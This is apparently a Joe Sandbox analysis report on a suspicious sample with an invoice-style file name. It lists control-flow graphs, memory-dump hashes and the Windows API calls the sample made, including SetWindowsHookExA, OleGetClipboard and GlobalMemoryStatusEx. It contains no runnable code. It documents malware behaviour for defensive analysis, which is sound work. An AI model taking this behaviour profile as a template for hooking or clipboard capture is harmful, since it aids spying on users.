KiUserCallbackDispatcher 37284->37287 37285->37284 37286->37283 37287->37283 37289 2b0869f MoveFileA 37288->37289 37291 2b086fa 37288->37291 37290 2b086cf 37289->37290 37290->37259 37291->37259 37293 2b08823 37292->37293 37294 2b088d9 37293->37294 37341 672f4d0 37293->37341 37346 672f4e0 37293->37346 37294->37259 37298 2b08630 MoveFileA 37297->37298 37300 2b086cf 37298->37300 37300->37267 37302 66c0865 37301->37302 37314 66c13bb 37302->37314 37323 66c13d0 37302->37323 37303 66c0299 37306 66c82f0 37303->37306 37310 66c8300 37303->37310 37307 66c8308 37306->37307 37309 66c832b 37307->37309 37337 66c7d7c 37307->37337 37309->37277 37311 66c8308 37310->37311 37312 66c7d7c KiUserCallbackDispatcher 37311->37312 37313 66c832b 37311->37313 37312->37311 37313->37277 37315 66c13fb 37314->37315 37316 66c07f4 GetModuleHandleW 37315->37316 37317 66c1462 37316->37317 37322 66c07f4 GetModuleHandleW 37317->37322 37332 66c1898 37317->37332 37318 66c147e 37319 66c14aa 37318->37319 37320 66c0804 GetModuleHandleW 37318->37320 37319->37319 37320->37319 37322->37318 37324 66c13fb 37323->37324 37325 66c07f4 GetModuleHandleW 37324->37325 37326 66c1462 37325->37326 37330 66c1898 GetModuleHandleW 37326->37330 37331 66c07f4 GetModuleHandleW 37326->37331 37327 66c147e 37328 66c0804 GetModuleHandleW 37327->37328 37329 66c14aa 37327->37329 37328->37329 37330->37327 37331->37327 37333 66c18a8 37332->37333 37334 66c18b3 37333->37334 37335 66c1fa6 GetModuleHandleW 37333->37335 37336 66c1f17 GetModuleHandleW 37333->37336 37334->37318 37335->37334 37336->37334 37338 66c8340 KiUserCallbackDispatcher 37337->37338 37340 66c83ae 37338->37340 37340->37307 37343 672f4f5 37341->37343 37342 672f70a 37342->37294 37343->37342 37344 672f720 GlobalMemoryStatusEx GlobalMemoryStatusEx 37343->37344 37345 672f97c GlobalMemoryStatusEx GlobalMemoryStatusEx 37343->37345 37344->37343 37345->37343 37348 672f4f5 37346->37348 37347 672f70a 37347->37294 37348->37347 37349 672f720 GlobalMemoryStatusEx GlobalMemoryStatusEx 37348->37349 37350 672f97c GlobalMemoryStatusEx GlobalMemoryStatusEx 37348->37350 37349->37348 37350->37348 37351 66c6d70 DuplicateHandle 37352 66c6e06 37351->37352 37353 66c8950 37354 66c89aa OleGetClipboard 37353->37354 37355 66c89ea 37354->37355 37356 66ca710 37359 66ca754 SetWindowsHookExA 37356->37359 37358 66ca79a 37359->37358 37360 66c21d3 37362 66c21f0 GetModuleHandleW 37360->37362 37363 66c2265 37362->37363

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 125 6723018-6723039 126 672303b-672303e 125->126 127 6723040-672305f 126->127 128 6723064-6723067 126->128 127->128 129 6723808-672380a 128->129 130 672306d-672308c 128->130 132 6723811-6723814 129->132 133 672380c 129->133 138 67230a5-67230af 130->138 139 672308e-6723091 130->139 132->126 134 672381a-6723823 132->134 133->132 142 67230b5-67230c4 138->142 139->138 140 6723093-67230a3 139->140 140->142 251 67230c6 call 6723831 142->251 252 67230c6 call 6723838 142->252 144 67230cb-67230d0 145 67230d2-67230d8 144->145 146 67230dd-67233ba 144->146 145->134 167 67233c0-672346f 146->167 168 67237fa-6723807 146->168 177 6723471-6723496 167->177 178 6723498 167->178 180 67234a1-67234b4 177->180 178->180 182 67237e1-67237ed 180->182 183 67234ba-67234dc 180->183 182->167 184 67237f3 182->184 183->182 186 67234e2-67234ec 183->186 184->168 186->182 187 67234f2-67234fd 186->187 187->182 188 6723503-67235d9 187->188 200 67235e7-6723617 188->200 201 67235db-67235dd 188->201 205 6723625-6723631 200->205 206 6723619-672361b 200->206 201->200 207 6723633-6723637 205->207 208 6723691-6723695 205->208 206->205 207->208 211 6723639-6723663 207->211 209 67237d2-67237db 208->209 210 672369b-67236d7 208->210 209->182 209->188 222 67236e5-67236f3 210->222 223 67236d9-67236db 210->223 218 6723671-672368e 211->218 219 6723665-6723667 211->219 218->208 219->218 225 67236f5-6723700 222->225 226 672370a-6723715 222->226 223->222 225->226 229 6723702 225->229 230 6723717-672371d 226->230 231 672372d-672373e 226->231 229->226 232 6723721-6723723 230->232 233 672371f 230->233 235 6723740-6723746 231->235 236 6723756-6723762 231->236 232->231 233->231 237 672374a-672374c 235->237 238 6723748 235->238 240 6723764-672376a 236->240 241 672377a-67237cb 236->241 237->236 238->236 242 672376e-6723770 240->242 243 672376c 240->243 241->209 242->241 243->241 251->144 252->144
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1342094364
                      • Opcode ID: 0c6cc37c8937df08646ced1316e2236ac45f6c1ba0acdd3f1d033471d8da8503
                      • Instruction ID: 59dc2902d03bcab09d38492845dd57fed7343a20aa6716ce2eb6e4880a8432ec
                      • Opcode Fuzzy Hash: 0c6cc37c8937df08646ced1316e2236ac45f6c1ba0acdd3f1d033471d8da8503
                      • Instruction Fuzzy Hash: D3323F34E1061ACFCB14EF74D99459DB7B2FF89310F60C69AD409AB264EB34A985CF90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 725 67278f8-6727916 726 6727918-672791b 725->726 727 672793e-6727941 726->727 728 672791d-6727939 726->728 731 6727943-672794d 727->731 732 672794e-6727951 727->732 728->727 733 6727953-6727961 732->733 734 6727968-672796b 732->734 741 672799e-67279b4 733->741 742 6727963 733->742 736 672798c-672798e 734->736 737 672796d-6727987 734->737 738 6727990 736->738 739 6727995-6727998 736->739 737->736 738->739 739->726 739->741 746 67279ba-67279c3 741->746 747 6727bcf-6727bd9 741->747 742->734 748 6727bda-6727c0f 746->748 749 67279c9-67279e6 746->749 752 6727c11-6727c14 748->752 758 6727bbc-6727bc9 749->758 759 67279ec-6727a14 749->759 753 6727cc1-6727cc4 752->753 754 6727c1a-6727c26 752->754 756 6727cc6-6727ce2 753->756 757 6727ce7-6727cea 753->757 760 6727c31-6727c33 754->760 756->757 761 6727cf0-6727cff 757->761 762 6727f1f-6727f21 757->762 758->746 758->747 759->758 780 6727a1a-6727a23 759->780 764 6727c35-6727c3b 760->764 765 6727c4b-6727c4f 760->765 775 6727d01-6727d1c 761->775 776 6727d1e-6727d62 761->776 766 6727f23 762->766 767 6727f28-6727f2b 762->767 770 6727c3f-6727c41 764->770 771 6727c3d 764->771 772 6727c51-6727c5b 765->772 773 6727c5d 765->773 766->767 767->752 774 6727f31-6727f3a 767->774 770->765 771->765 778 6727c62-6727c64 772->778 773->778 775->776 786 6727ef3-6727f09 776->786 787 6727d68-6727d79 776->787 781 6727c66-6727c69 778->781 782 6727c7b-6727cb4 778->782 780->748 784 6727a29-6727a45 780->784 781->774 782->761 806 6727cb6-6727cc0 782->806 793 6727baa-6727bb6 784->793 794 6727a4b-6727a75 784->794 786->762 796 6727ede-6727eed 787->796 797 6727d7f-6727d9c 787->797 793->758 793->780 809 6727ba0-6727ba5 794->809 810 6727a7b-6727aa3 794->810 796->786 796->787 797->796 807 6727da2-6727e98 call 6726110 797->807 859 6727ea6 807->859 860 6727e9a-6727ea4 807->860 809->793 810->809 816 6727aa9-6727ad7 810->816 816->809 822 6727add-6727ae6 816->822 822->809 823 6727aec-6727b1e 822->823 831 6727b20-6727b24 823->831 832 6727b29-6727b45 823->832 831->809 833 6727b26 831->833 832->793 834 6727b47-6727b9e call 6726110 832->834 833->832 834->793 861 6727eab-6727ead 859->861 860->861 861->796 862 6727eaf-6727eb4 861->862 863 6727ec2 862->863 864 6727eb6-6727ec0 862->864 865 6727ec7-6727ec9 863->865 864->865 865->796 866 6727ecb-6727ed7 865->866 866->796
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq
                      • API String ID: 0-3550614674
                      • Opcode ID: 417a91ce45de3ee6e1846f1d596fc1f69bf72f9b5bbe36a04c5e5b7cdd71e3fa
                      • Instruction ID: c6951621af7abe7c1ba06286a8b5ec49c72fddcfc6348ae5a1c476ab58dfacbe
                      • Opcode Fuzzy Hash: 417a91ce45de3ee6e1846f1d596fc1f69bf72f9b5bbe36a04c5e5b7cdd71e3fa
                      • Instruction Fuzzy Hash: 75029030B002268FDB58DF69D6906AEB7F6EF84304F248529D405DB399DB35ED86CB90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0407fb1a4a599206fef7085d964b695d241039ea8d9d69e233a25ce50b3644a
                      • Instruction ID: 4ac9366b9bff63cedd921c85f8ea2a93f03bf47f4c70b3656a96d2fb8af199f0
                      • Opcode Fuzzy Hash: f0407fb1a4a599206fef7085d964b695d241039ea8d9d69e233a25ce50b3644a
                      • Instruction Fuzzy Hash: 6A926730A002168FCB64DF68C584A6DB7F2FF45314F5485A9E819AB366DB35EE85CF80
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7ff43f0b4624d17e39e3fcc4ac020b2a60e9c25eb6bf324d47223b7dac08c7b8
                      • Instruction ID: 51dddfa042f694f089dd2260be3e5c4ae220a5a964274931b46b4e3a1205f6bb
                      • Opcode Fuzzy Hash: 7ff43f0b4624d17e39e3fcc4ac020b2a60e9c25eb6bf324d47223b7dac08c7b8
                      • Instruction Fuzzy Hash: 1A62C134F002268FDB54DB68D694AADB7F2EF84314F24846AE805DB395DB35ED85CB80
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f927dab92950085d1a8d56c3ff297963fd0c903d8063102c737e5ec0c4b91ee7
                      • Instruction ID: b4921f8d7ca24cf5d9601dc8ad76df329533e21b2b5bdd07b2f2e4f22ac4e013
                      • Opcode Fuzzy Hash: f927dab92950085d1a8d56c3ff297963fd0c903d8063102c737e5ec0c4b91ee7
                      • Instruction Fuzzy Hash: 8C329230B102168FDBA5DF68DA80BAEB7B2FB88314F108525E505E7359DB35DD42CB91
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f46c2dc57777cd3874e026214acac40ff7d7c54140c2088673ace2fe21c70b70
                      • Instruction ID: 65413bbd8d2f43782a6b9e9a2733e68fde57cf044f4fd23c64a2ec74c63ce692
                      • Opcode Fuzzy Hash: f46c2dc57777cd3874e026214acac40ff7d7c54140c2088673ace2fe21c70b70
                      • Instruction Fuzzy Hash: 3B12CF71F002269FEB64DF64D98067EBBB6EF85310F248429E906DB395DA34EC45CB90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89a22e048ceb27617ee377963a1b6fb4c978d4748d2be41bd1c3f46feb39d75e
                      • Instruction ID: ba3ca4ed36ecf1c8162de9e658de23a70f852e9a07543b4552c120215ff562ec
                      • Opcode Fuzzy Hash: 89a22e048ceb27617ee377963a1b6fb4c978d4748d2be41bd1c3f46feb39d75e
                      • Instruction Fuzzy Hash: 7722A230E0021A8FDF64DB68C9807BEB7B6FB45714F208826E419EB395DA35DC85CB91
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d80aaee1559ee118eec83e8c504ca2b108bfba2be31ef7497aa294d3bac31a4a
                      • Instruction ID: 80e90d5b092be6c5a6411159ffcab7c9c83b2477fc8a5640f71987af4ff96e86
                      • Opcode Fuzzy Hash: d80aaee1559ee118eec83e8c504ca2b108bfba2be31ef7497aa294d3bac31a4a
                      • Instruction Fuzzy Hash: 51B15CB0E00209CFDB11DFA9D9C179DBFF2EF88314F148569D915A72A4EB749885CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 81f318ea36d3b1ab154588c305afb942e08207a0394db239d73e46273bfb3c0a
                      • Instruction ID: e9f8cc2ed8d2b738fcff004ca16676815fe5e18756632e3ac0b300b0429352e9
                      • Opcode Fuzzy Hash: 81f318ea36d3b1ab154588c305afb942e08207a0394db239d73e46273bfb3c0a
                      • Instruction Fuzzy Hash: 9CA19034E007099FCB44DFA4D9949EDFBBAFF89310F158219E415AB3A4EB30A945CB90
                      Memory Dump Source
                      • Source File: 00000001.00000002.4198187365.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_2b00000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 804555e08b06daca0a4c621c54a3ca9b0173f948796680ad08f170f6f3ef266b
                      • Instruction ID: 30977d4dbbe25aa2eea0de2ecbdc259d15a7202dc32b00d408f9bdb2f361663b
                      • Opcode Fuzzy Hash: 804555e08b06daca0a4c621c54a3ca9b0173f948796680ad08f170f6f3ef266b
                      • Instruction Fuzzy Hash: 61914D70E00209DFDB11DFA9C98579DBFF2EF88314F148569E415A72A4EB749885CB81
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d2bf2e97ebb56d22634ee15df83adb24d0e53dc9b8f3d08549e5125c957f364
                      • Instruction ID: 4a9a8338186f6524a30f6f2602b7426dd0ee7832183821da51eb09be785fad2c
                      • Opcode Fuzzy Hash: 2d2bf2e97ebb56d22634ee15df83adb24d0e53dc9b8f3d08549e5125c957f364
                      • Instruction Fuzzy Hash: CF918035E0071A9FCB44DFA4D9848EDFBBAFF89310F158219E515AB3A4EB30A945CB50
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0ce0cb0295f8aea64585f45ce4f440b3871bd922b117d283e2a43ba85af8a413
                      • Instruction ID: 6918db1c509ee8ed172e1329ecabef59158e4966d3712246679d6aa77bf4fae6
                      • Opcode Fuzzy Hash: 0ce0cb0295f8aea64585f45ce4f440b3871bd922b117d283e2a43ba85af8a413
                      • Instruction Fuzzy Hash: D7918035E0070A9FCB44DFA1D9848EDFBBAFF89310F158219E515AB3A4EB30A945CB50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 672a838-672a856 1 672a858-672a85b 0->1 2 672a86b-672a86e 1->2 3 672a85d-672a866 1->3 4 672a870-672a88c 2->4 5 672a891-672a894 2->5 3->2 4->5 6 672a896-672a8a9 5->6 7 672a8ae-672a8b1 5->7 6->7 9 672a8b3-672a8c0 7->9 10 672a8c5-672a8c8 7->10 9->10 12 672a8d2-672a8d5 10->12 13 672a8ca-672a8cf 10->13 14 672a8d7-672a8e0 12->14 15 672a8ef-672a8f2 12->15 13->12 18 672a8e6-672a8ea 14->18 19 672aa6f-672aaa6 14->19 20 672aa55-672aa5e 15->20 21 672a8f8-672a8fb 15->21 18->15 29 672aaa8-672aaab 19->29 20->14 24 672aa64-672aa6e 20->24 22 672a90c-672a90e 21->22 23 672a8fd-672a901 21->23 27 672a910 22->27 28 672a915-672a918 22->28 23->24 26 672a907 23->26 26->22 27->28 28->1 30 672a91e-672a942 28->30 31 672aab8-672aabb 29->31 32 672aaad-672aab1 29->32 48 672aa52 30->48 49 672a948-672a957 30->49 35 672aade-672aae1 31->35 36 672aabd-672aad9 31->36 33 672aab3 32->33 34 672aae7-672ab22 32->34 33->31 44 672ad15-672ad28 34->44 45 672ab28-672ab34 34->45 35->34 38 672ad4a-672ad4d 35->38 36->35 40 672ad5a-672ad5d 38->40 41 672ad4f-672ad59 38->41 46 672ad5f call 672ad90 40->46 47 672ad6c-672ad6e 40->47 53 672ad2a 44->53 61 672ab36-672ab4f 45->61 62 672ab54-672ab98 45->62 56 672ad65-672ad67 46->56 50 672ad70 47->50 51 672ad75-672ad78 47->51 48->20 59 672a959-672a95f 49->59 60 672a96f-672a9aa call 6726110 49->60 50->51 51->29 57 672ad7e-672ad88 51->57 58 672ad2b 53->58 56->47 58->58 63 672a963-672a965 59->63 64 672a961 59->64 76 672a9c2-672a9d9 60->76 77 672a9ac-672a9b2 60->77 61->53 78 672abb4-672abf3 62->78 79 672ab9a-672abac 62->79 63->60 64->60 90 672a9f1-672aa02 76->90 91 672a9db-672a9e1 76->91 80 672a9b6-672a9b8 77->80 81 672a9b4 77->81 85 672acda-672acef 78->85 86 672abf9-672acd4 call 6726110 78->86 79->78 80->76 81->76 85->44 86->85 98 672aa04-672aa0a 90->98 99 672aa1a-672aa4b 90->99 93 672a9e3 91->93 94 672a9e5-672a9e7 91->94 93->90 94->90 100 672aa0e-672aa10 98->100 101 672aa0c 98->101 99->48 100->99 101->99
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                      • API String ID: 0-1078448309
                      • Opcode ID: 3d66cedaa1304cf95de16dbd5a4502dada567d74312f167a6fd8a63e55d90bee
                      • Instruction ID: 113077723a9efc878deacf94cb68d2fc2e4351b8da752e0582ba1a753722b584
                      • Opcode Fuzzy Hash: 3d66cedaa1304cf95de16dbd5a4502dada567d74312f167a6fd8a63e55d90bee
                      • Instruction Fuzzy Hash: D8E18030E1025A8FCB65DF69D9806AEB7B2FF85304F208529D805EB359DB35DC86CB90

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 253 66c6b19-66c6b20 254 66c6b29-66c6bb7 GetCurrentProcess 253->254 255 66c6b22-66c6b28 253->255 260 66c6bb9-66c6bbf 254->260 261 66c6bc0-66c6bf4 GetCurrentThread 254->261 255->254 260->261 262 66c6bfd-66c6c31 GetCurrentProcess 261->262 263 66c6bf6-66c6bfc 261->263 264 66c6c3a-66c6c55 call 66c6cf8 262->264 265 66c6c33-66c6c39 262->265 263->262 269 66c6c5b-66c6c8a GetCurrentThreadId 264->269 265->264 270 66c6c8c-66c6c92 269->270 271 66c6c93-66c6cf5 269->271 270->271
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 066C6BA6
                      • GetCurrentThread.KERNEL32 ref: 066C6BE3
                      • GetCurrentProcess.KERNEL32 ref: 066C6C20
                      • GetCurrentThreadId.KERNEL32 ref: 066C6C79
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 3534e6037dd21677330783067e575c93e314b2fc2922878f2128f9853c860a5a
                      • Instruction ID: 6e6d18813b5307cc2741843a271c2c889dc7a88845731df92655ed00e2db3878
                      • Opcode Fuzzy Hash: 3534e6037dd21677330783067e575c93e314b2fc2922878f2128f9853c860a5a
                      • Instruction Fuzzy Hash: 8A5157B0D016498FDB54DFAAD948BEEBBF2EF48314F208059E409A7361D734A944CF69

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 278 66c6b28-66c6bb7 GetCurrentProcess 283 66c6bb9-66c6bbf 278->283 284 66c6bc0-66c6bf4 GetCurrentThread 278->284 283->284 285 66c6bfd-66c6c31 GetCurrentProcess 284->285 286 66c6bf6-66c6bfc 284->286 287 66c6c3a-66c6c55 call 66c6cf8 285->287 288 66c6c33-66c6c39 285->288 286->285 292 66c6c5b-66c6c8a GetCurrentThreadId 287->292 288->287 293 66c6c8c-66c6c92 292->293 294 66c6c93-66c6cf5 292->294 293->294
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 066C6BA6
                      • GetCurrentThread.KERNEL32 ref: 066C6BE3
                      • GetCurrentProcess.KERNEL32 ref: 066C6C20
                      • GetCurrentThreadId.KERNEL32 ref: 066C6C79
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208486254.00000000066C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_66c0000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: db048a4c14dd209310ccba90ed4906e799ac416cc51edb2badfc4fc6359a6aaf
                      • Instruction ID: 860241be0e90b3eb1341b1fecec069648030902929f32a8a166393bd62e96230
                      • Opcode Fuzzy Hash: db048a4c14dd209310ccba90ed4906e799ac416cc51edb2badfc4fc6359a6aaf
                      • Instruction Fuzzy Hash: A75147B0D00609CFDB94DFAAD948BAEBBF1EF48314F208459E419A7360D734A944CF69

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 301 6728cc8-6728ced 302 6728cef-6728cf2 301->302 303 67295b0-67295b3 302->303 304 6728cf8-6728d0d 302->304 305 67295b5-67295d4 303->305 306 67295d9-67295db 303->306 311 6728d25-6728d3b 304->311 312 6728d0f-6728d15 304->312 305->306 308 67295e2-67295e5 306->308 309 67295dd 306->309 308->302 313 67295eb-67295f5 308->313 309->308 318 6728d46-6728d48 311->318 314 6728d17 312->314 315 6728d19-6728d1b 312->315 314->311 315->311 319 6728d60-6728dd1 318->319 320 6728d4a-6728d50 318->320 331 6728dd3-6728df6 319->331 332 6728dfd-6728e19 319->332 321 6728d52 320->321 322 6728d54-6728d56 320->322 321->319 322->319 331->332 337 6728e45-6728e60 332->337 338 6728e1b-6728e3e 332->338 343 6728e62-6728e84 337->343 344 6728e8b-6728ea6 337->344 338->337 343->344 349 6728ecb-6728ed9 344->349 350 6728ea8-6728ec4 344->350 351 6728edb-6728ee4 349->351 352 6728ee9-6728f63 349->352 350->349 351->313 358 6728fb0-6728fc5 352->358 359 6728f65-6728f83 352->359 358->303 363 6728f85-6728f94 359->363 364 6728f9f-6728fae 359->364 363->364 364->358 364->359
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.4208882831.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_6720000_Ship Docs YINGHAI-MANE PO 240786.jbxd
                      Similarity
                      • API ID:
                      • String ID: $kq$$kq$$kq$$kq
                      • API String ID: 0-2881790790
                      • Opcode ID: 5b3b8417f5f498ed201b665014e0ef81510300579e3b6dc791bff9aa58a1b2f3
                      • Instruction ID: 20b8f4c7eab57839dc4cb70a3800df291d6d75ac24379a714ad1721c54cc6700
                      • Opcode Fuzzy Hash: 5b3b8417f5f498ed201b665014e0ef81510300579e3b6dc791bff9aa58a1b2f3
                      • Instruction Fuzzy Hash: 42914030F1021A8FDB64DF65DA507AEB3F6AB88240F508969D409EB398EA31DD45CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 367 672cec8-672cee3 368 672cee5-672cee8 367->368 369 672cef2-672cef5 368->369 370 672ceea-672ceef 368->370 371 672cef7-672cf39 369->371 372 672cf3e-672cf41 369->372 370->369 371->372 373 672cf43-672cf85 372->373 374 672cf8a-672cf8d 372->374 373->374 376 672cfd6-672cfd9 374->376 377 672cf8f-672cfd1 374->377 379 672cfdb-672cfdd 376->379 380 672cfe8-672cfeb 376->380 377->376 382 672cfe3 379->382 383 672d26f-672d278 379->383 384 672d034-672d037 380->384 385 672cfed-672d02f 380->385 382->380 390 672d287-672d293 383->390 391 672d27a-672d27f 383->391 388 672d080-672d083 384->388 389 672d039-672d07b 384->389 385->384 393 672d085-672d0c7 388->393 394 672d0cc-672d0cf 388->394 389->388 396 672d3a4-672d3a9 390->396 397 672d299-672d2ad 390->397 391->390 393->394 399 672d0d1-672d113 394->399 400 672d118-672d11b 394->400 412 672d3b1 396->412 411 672d2b3-672d2c5 397->411 397->412 399->400 408 672d121-672d124 400->408 409 672d3b4-672d3c0 400->409 416 672d126-672d142 408->416 417 672d147-672d14a 408->417 418 672d3c6-672d6b3 409->418 419 672d14c-672d15b 409->419 437 672d2c7-672d2cd 411->437 438 672d2e9-672d2eb 411->438 412->409 416->417 417->419 421 672d193-672d196 417->421 579 672d8da-672d8e4 418->579 580 672d6b9-672d6bf 418->580 422 672d16a-672d176 419->422 423 672d15d-672d162 419->423 435 672d1a5-672d1a8 421->435 436 672d198-672d19a 421->436 433 672d8e5-672d91e 422->433 434 672d17c-672d18e 422->434 423->422 459 672d920-672d923 433->459 434->421 443 672d1f1-672d1f4 435->443 444 672d1aa-672d1ec 435->444 436->412 442 672d1a0 436->442 445 672d2d1-672d2dd 437->445 446 672d2cf 437->446 458 672d2f5-672d301 438->458 442->435 448 672d211-672d214 443->448 449 672d1f6-672d20c 443->449 444->443 456 672d2df-672d2e7 445->456 446->456 460 672d216-672d225 448->460 461 672d25d-672d25f 448->461 449->448 456->458 483 672d303-672d30d 458->483 484 672d30f 458->484 466 672d946-672d949 459->466 467 672d925-672d941 459->467 468 672d227-672d22c 460->468 469 672d234-672d240 460->469 472 672d261 461->472 473 672d266-672d269 461->473 478 672d94b-672d977 466->478 479 672d97c-672d97f 466->479 467->466 468->469 469->433 477 672d246-672d258 469->477 472->473 473->368 473->383 477->461 478->479 487 672d981 call 672da3d 479->487 488 672d98e-672d990 479->488 490 672d314-672d316 483->490 484->490 497 672d987-672d989 487->497 492 672d992 488->492 493 672d997-672d99a 488->493 490->412 494 672d31c-672d338 call 6726110 490->494 492->493 493->459 498 672d99c-672d9ab 493->498 511 672d347-672d353 494->511 512 672d33a-672d33f 494->512 497->488 503 672da12-672da27 498->503 504 672d9ad-672da10 call 6726110 498->504 504->503 511->396 514 672d355-672d3a2 511->514 512->511 514->412 581 672d6c1-672d6c6 580->581 582 672d6ce-672d6d7 580->582 581->582 582->433 583 672d6dd-672d6f0 582->583 585 672d6f6-672d6fc 583->585 586 672d8ca-672d8d4 583->586 587 672d70b-672d714 585->587 588 672d6fe-672d703 585->588 586->579 586->580 587->433 589 672d71a-672d73b 587->589 588->587 592 672d74a-672d753 589->592 593 672d73d-672d742 589->593 592->433 594 672d759-672d776 592->594 593->592 594->586 597 672d77c-672d782 594->597 597->433 598 672d788-672d7a1 597->598 600 672d7a7-672d7ce 598->600 601 672d8bd-672d8c4 598->601 600->433 604 672d7d4-672d7de 600->604 601->586 601->597 604->433 605 672d7e4-672d7fb 604->605 607 672d80a-672d825 605->607 608 672d7fd-672d808 605->608 607->601 613 672d82b-672d844 call 6726110 607->613 608->607 617 672d853-672d85c 613->617 618 672d846-672d84b 613->618 617->433 619 672d862-672d8b6 617->619 618->617 619->601
                      Strings
                      Memory Dump Source
